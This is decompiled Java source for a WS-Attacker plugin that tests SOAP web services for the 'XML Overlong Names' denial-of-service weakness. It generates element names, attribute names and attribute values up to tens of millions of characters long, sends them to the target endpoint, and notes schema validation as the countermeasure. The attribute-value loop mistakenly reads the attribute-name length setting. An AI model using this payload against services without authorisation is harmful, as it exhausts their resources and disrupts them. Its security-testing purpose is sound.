/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.main.plugin.option.OptionSimpleBoolean;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class XmlOverlongNames
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private OptionSimpleBoolean useLengthOfElementName;
    private AbstractOptionInteger lengthOfElementName;
    private OptionSimpleBoolean useLengthOfAttributeName;
    private AbstractOptionInteger lengthOfAttributeName;
    private OptionSimpleBoolean useLengthOfAttributeValue;
    private AbstractOptionInteger lengthOfAttributeValue;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.useLengthOfElementName = new OptionSimpleBoolean("XML overlong element name", true, "checked = XML overlong element name attack enabled");
        this.lengthOfElementName = new OptionLimitedInteger("XML overlong element name: Length", 100000, "Length of overlong element name", 2, 90000000);
        this.useLengthOfAttributeName = new OptionSimpleBoolean("XML overlong attribute name", true, "checked = XML overlong attribute name attack enabled");
        this.lengthOfAttributeName = new OptionLimitedInteger("XML overlong attribute name: Length", 100000, "Length of overlong attribute name", 2, 90000000);
        this.useLengthOfAttributeValue = new OptionSimpleBoolean("XML overlong attribute value", true, "checked = XML overlong attribute value attack enabled");
        this.lengthOfAttributeValue = new OptionLimitedInteger("XML overlong attribute value: Lenght", 100000, "Length of overlong attribute value", 2, 90000000);
        this.getPluginOptions().add((AbstractOption)this.useLengthOfElementName);
        this.getPluginOptions().add((AbstractOption)this.lengthOfElementName);
        this.getPluginOptions().add((AbstractOption)this.useLengthOfAttributeName);
        this.getPluginOptions().add((AbstractOption)this.lengthOfAttributeName);
        this.getPluginOptions().add((AbstractOption)this.useLengthOfAttributeValue);
        this.getPluginOptions().add((AbstractOption)this.lengthOfAttributeValue);
    }

    public AbstractOptionInteger getOptionLengthOfElementName() {
        return this.lengthOfElementName;
    }

    public OptionSimpleBoolean getUseLengthOfElementName() {
        return this.useLengthOfElementName;
    }

    public AbstractOptionInteger getOptionLengthOfAttributeName() {
        return this.lengthOfAttributeName;
    }

    public OptionSimpleBoolean getUseLengthOfAttributeName() {
        return this.useLengthOfAttributeName;
    }

    public AbstractOptionInteger getOptionLengthOfAttributeValue() {
        return this.lengthOfAttributeValue;
    }

    public OptionSimpleBoolean getUseLengthOfAttributeValue() {
        return this.useLengthOfAttributeValue;
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.HEADERLASTCHILDELEMENT;
    }

    public void initData() {
        this.setName("XML Overlong Names Attack");
        this.setDescription("<html><p>This attack checks whether or not a Web service is vulnerable to the \"XML Overlong Names\" attack.</p><p>A vulnerable Web service will run out of resources when trying to parse an XML message with overlong names.</p><p>A detailed description of the attack can be found on <a href=\"http://clawslab.nds.rub.de/wiki/index.php/XML_MegaTags\">http://clawslab.nds.rub.de/wiki/index.php/XML_MegaTags</a>./p><p>The attack algorithm replaces the string $$PAYLOADELEMENT$$ in the SOAP message below with the payload defined in parameter 8-10.</p><p>The placeholder $$PAYLOADELEMENT$$ can be set to any other position in the SOAP message</p><p>The following parameters can be used to insert overlong names:</p><ul><li>Param 8.1: Only if enabled,length of an overlong element name in kb</li><li>Param 9.1: Only if enabled, length of an overlong attribute name in kb</li><li>Param 10.1: Only if enabled, length of overlong attribute content in kb</li></ul><p>The attack parameters 8, 9 and 10 are independent of each other. Each subattack will be inserted in a seperate element. A change in one parameter has no effect on the other.</p></html>");
        this.setCountermeasures("In order to counter the attack, strict XML schema validation should be performed to catch these oversized nodes and values.");
    }

    @Override
    public void createTamperedRequest() {
        int i;
        StringBuilder sb = new StringBuilder("");
        if (this.useLengthOfElementName.isOn()) {
            sb.append("<");
            for (i = 1; i < this.lengthOfElementName.getValue(); ++i) {
                sb.append("A");
            }
            sb.append(">test</");
            for (i = 1; i < this.lengthOfElementName.getValue(); ++i) {
                sb.append("A");
            }
            sb.append(">");
        }
        if (this.useLengthOfAttributeName.isOn()) {
            sb.append("<abc ");
            for (i = 1; i < this.lengthOfAttributeName.getValue(); ++i) {
                sb.append("B");
            }
            sb.append("=\"test\">value</abc>");
        }
        if (this.useLengthOfAttributeValue.isOn()) {
            sb.append("<def long=\"");
            for (i = 1; i < this.lengthOfAttributeName.getValue(); ++i) {
                sb.append("C");
            }
            sb.append("\">value</def>");
        }
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, sb.toString());
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

